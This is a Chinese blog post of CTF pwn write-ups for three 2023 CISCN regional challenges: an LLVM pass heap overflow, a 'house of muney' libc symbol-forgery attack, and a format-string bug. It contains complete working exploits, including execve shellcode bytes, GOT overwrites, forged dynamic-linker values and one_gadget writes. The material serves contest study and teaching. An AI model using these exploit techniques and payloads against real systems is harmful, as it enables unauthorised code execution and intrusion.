2023CISCN—华中赛区—pwn wp

已于 2023-07-15 10:30:17 修改
阅读量1.3k 收藏 4
点赞数 4
文章标签: python 安全
于 2023-07-13 20:08:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/131708010
版权

llvm

之前写过几篇llvm的分析和题解,感觉这次ciscn还得出llvm,不过这个llvm相对之前的还是比较简单的,漏洞点也是白给,利用也较为简单。(这里我用的是ubuntu20。)

程序分析

先简单贴一下程序大致流程

Add函数

 Del函数

Edit函数

 

 Alloc函数

 EditAlloc函数

 代码大概就是这样,刚开始做的时候已经把一些llvm函数忘得差不多了,又看winmt的博客补了一下。

add函数:申请一个堆块

del函数:释放一个堆块

edit函数:对一个堆块进行edit,存在溢出

alloc函数:申请一块rwx内存,地址0x10000

editalloc函数:像0x10000内存写入一个堆地址存放的数据指向的地址(感觉没啥用)

漏洞利用

1.申请几个连续的大小相同的堆块,释放中间两个,修改上边的堆块的fd指针为0x10000。

2.申请两个堆块,其中第二个堆块指向0x10000,调用alloc函数将0x10000设置为rwx,向其中写入shellcode的字节码,注意顺序即可。

3.再释放两个相邻堆块,改堆块fd为free_got,申请回free_got,将其改为0x10000。

4.退出llvm.so时执行free函数,执行我们的shellcode来get shell。

几个注意点

1、我在做这个题的时候,刚开始用clang-15编译,然后用opt-10执行一直报错,这里clang应该与opt的版本对应,太久没看过llvm了。

2、在程序执行的时候,首先跑llvm.so,在跑完退出时会调用opt里的函数,这里opt是没有开pie的,所以改opt里的free_got函数。

exp

#include<stdio.h>
int Add(int size){

}

int Del(int index){

}
int Edit(int index,int offset,int content){

}

int Alloc(){

}
int EditAlloc(int index,int offset){

}
int Hello(){

	Add(0x1000);//0
	Add(0x1000);//1
	Add(0x1000);//2
//\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
	Add(176);//3
	Add(176);//4
	Add(176);//5
	Add(176);//6

	Add(176);//7
	Add(176);//8
	Add(176);//9
	Add(176);//10
	Del(5);
	Del(4);
	Edit(3,48,65536);
	Alloc();
	Add(176);//4
	Add(176);//5-->0x10000
	Edit(5,0,0x56f63148);  
    Edit(5,1,0x622fbf48);  
    Edit(5,2,0x2f2f6e69);  
    Edit(5,3,0x54576873);  
    Edit(5,4,0x583b6a5f);  
    Edit(5,5,0x050f99);  
	// Edit(5,5,0x050f99); 
	Del(9);
	Del(8);
	Edit(7,48,0x78b108);
	Add(176);//8
	Add(176);//9--->free_got
	Edit(9,0,0x10000);
	Edit(9,1,0);


	return 0;
	
}

调试

其实我感觉llvm难点就是调试,这里首先给出几个命令。

test.c编译为test.ll

/usr/bin/clang-10 -emit-llvm -S test.c -o test.ll

gdb动态调试

gdb opt-10
set args -load ./LLVMHello.so -Hello ./test.ll
b main
r

首先跑完一大堆的llvm函数,然后用llvm.so加偏移下断点

这里我直接用exp跑。

Alloc函数执行

将shellcode写入0x10000

链入free_got

 修改free_got为0x10000

执行exit

 跑掉一大堆其他plt,进入free_plt

 成功执行shellcode

muney 

这个题看了roderick师傅的博客和pukrquq的博客,弄了挺长时间,不过总算会了。

程序分析

前边一大堆的逆向,需要知道http数据包如何构造,这个跟上海磐石杯那个hp题挺像的,具体逆向不再分析,主要说一下house of muney这个方法(以前就没有听过)。

利用手法

当堆管理器分配超大内存时,会调用mmap函数申请内存,申请的内存一般位于libc.so.6内存的低地址处。如果可以修改mmap申请的这段内存的size,那么我们再次申请回来就可以覆盖掉libc.so.6的符号表,哈希表等空间并进行改写伪造,在解析函数实际地址的时候就能控制其解析为任意地址,进而控制程序执行流。

这里先给出exp再进行说明:

exp

from pwn import *
context.log_level='debug'
r=process('./muney')
elf=ELF('./muney')
libc=elf.libc

def add(size,cont):
    payload='POST /create HTTP/1.0 \nSize:'+str(size)+"\n"+'Content-Length:'+str(len(cont))+'\n\r\n'+cont
    r.sendafter("HTTP_Parser> ",payload)

def delete(idx):
    payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:16" + '\n\r\n' + 'a'*16
    r.sendafter("HTTP_Parser> ",payload)


def edit(idx,offset,cont):
    payload=b'POST /edit HTTP/1.0 \nIdx:' + str(idx).encode() +b'\n'+b'Offset:'+str(offset).encode()+b'\n'+b"Content-Length:"+str(len(cont)).encode()+b'\n\r\n'+cont     
    r.sendafter("HTTP_Parser> ",payload)

def quit(cont):
    payload='POST /quit HTTP/1.0 \n'+'Content-Length:'+str(len(cont))+'\n\r\n'+cont
    r.sendafter("HTTP_Parser> ",payload)

add(0x150000,'a'*16)
edit(0,-8,b'\x02\x10\x17')
delete(0)
add(0x171002,'a'*16)
edit(0,0x152b78,p64(0xaaa101010210130e))
edit(0,0x152ca0,p8(0x86))
edit(0,0x153d6c,p64(0x7c967e3e7c93f2a0))
edit(0,0x156d18-0x8,b"\x90\x22\x05")
edit(0,0x156d18-0x10,b"\xbd\xa1\x1a")
edit(0,0x156d18-0x10+4,b"\x12")
edit(0,0x156d18-0x10+6,b"\xf0")
gdb.attach(r)
quit('a'*16)
r.interactive()

调试

house of muney的关键在于伪造几个值:

  1. bitmask_word
  2. bucket
  3. hasharr
  4. target symbol ->st_value

调试一下看看这几个值在哪里(注意这里需要用到glibc源码调试,这里使用2.31)

需要先跑过一次while(++i < n)

当源码走到这里时,记录一下bitmask_word的值

走到这里,查看一下bucket的值

 走到这里查看一下hasharr。

走到这里会有sym符号表结构的一些值

 这里需要将st_name改成strtab与exit的偏移,st_value改成system的st_value。

编写一个c程序执行system看一下值(这个c程序不能开pie和full relro)

 

是0x52290 。

再来找一下st_name,这里有几个可以选择,试试哪个通就行

 全部找到后就可以edit伪造了。

最后执行exit("/bin/sh");就能get shell。

AWD

程序分析

在main函数中有一个跳转,看一下off_5060位置

可以看到我们输入的shell命令不同,会跳转到不同函数,这跟初赛的shellwego类似。

漏洞点位于echo里的格式化字符串漏洞

由于该shell是循环输入,所以可以循环利用这个格式化字符串漏洞泄露libc和stack,然后劫持libc_start_main为onegadget即可。

exp

from pwn import *
context.log_level='debug'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc

def shell(payload):
    r.sendlineafter("$ \x1B[0m",payload)

# gdb.attach(r)
shell("echo %29$p a")
libc_base=int(r.recv(14),16)-243-libc.sym['__libc_start_main']
print("libc_base------------->",hex(libc_base))
one_gadget=[0xe3afe,0xe3b01,0xe3b04]
ogg=libc_base+one_gadget[2]
shell("echo %12$p b")
stack=int(r.recv(14),16)
print("stack-------------->",hex(stack))
libc_start_main=stack+0x38

shell("echo %"+str(libc_start_main&0xffff)+'c%31$hn c')
shell("echo %"+str(ogg&0xffff)+"c%59$hn d")
shell("echo %"+str(libc_start_main+2&0xffff)+'c%31$hn e')
shell("echo %"+str((ogg>>16)&0xffff)+"c%59$hn f")
shell("KingKi1L3r")
r.interactive()

KingKi1L3r
关注
【CTF】2023Ciscn WEB方向题解
Sapphire037的博客
05-29 2603
比赛体验一般,一黑灯基本上题都烂掉。
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2299
2022 CISCN 初赛pwn的完整wp
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2609
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
2023CISCN部分wp
qq_51862722的博客
05-29 860
2023ciscn部分wp
2023 ciscn国赛pwn lojin wp
cainiao78777的博客
05-29 2499
第一次参加国赛,被队友带飞了,pwn只做出来了四个,1381分,第16名,总体来说还可以在所有题目中,也是拿到了pwn题login的一血话说回来,来详细说一下,这个pwn题的解法首先就是能看到这是个没附件的pwn题说明只能通过交互去得到信息,再寻找方向,连接之后应该就是这四个选项。
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 1034
随便写写
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
2022 ciscn 东北赛区分区赛 部分 wp
qq_23321269的博客
06-19 8427
2022 ciscn 东北分区赛 部分wp
2021第十四届全国大学生信息安全竞赛WPCISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1210
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
2023上海“磐石行动”pwn wp
m0_63437215的博客
05-23 567
2023上海市大学生网络安全大赛 pwn
ciscn2023华北赛区
……
06-29 1034
利用点在这里的os.system函数。这里的savepath是我们可控的,通过修改文件名就可以控制savepath的值,所以在os.system函数中拼接系统命令,本地运行进行调试。看到在本地是执行了命令的,但是页面上没有回显,考虑弹shell,因为不允许一些符号使用,所以用base64编码一下。利用不同类型a=1和b='1’绕过强等判断。这里通过’'符号来绕过,/f\l\a\g。这里禁止了通过数组绕过md5的方法。反序列化触发wakeup函数。payload拿到原题。
2023全国大学生信息安全竞赛(ciscn)初赛题解
热门推荐
返璞归真的博客
05-28 2万+
2023全国大学生信息安全竞赛(ciscn)部分题解
CISCN 2023 华中分区赛 awd pwn——tsh
最新发布
CoLin的pwn小屋
07-10 2084
CISCN 2023 awd pwn 分析
[CISCN 2023]—DeserBug
Sentiment的博客
05-30 986
CISCN 2023 DeserBug
2023ciscn初赛 -- BackendService
qq_44640313的博客
06-03 1012
CVE-2022-22947的漏洞和nacos存在鉴权漏洞
ciscn 2023 初赛 pwn StrangeTalkBot
z1r0的博客
06-02 641
这里坑点是sint64和int64,导致如果用int64需要把index*2,用int64死活不能成功。uaf,然后可以edit,但是需要写一个proto,然后生成一下序列化python文件。生成之后导入到exp中,正常的2.31 orw利用。
Pwnwp
weixin_52553215的博客
11-22 805
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值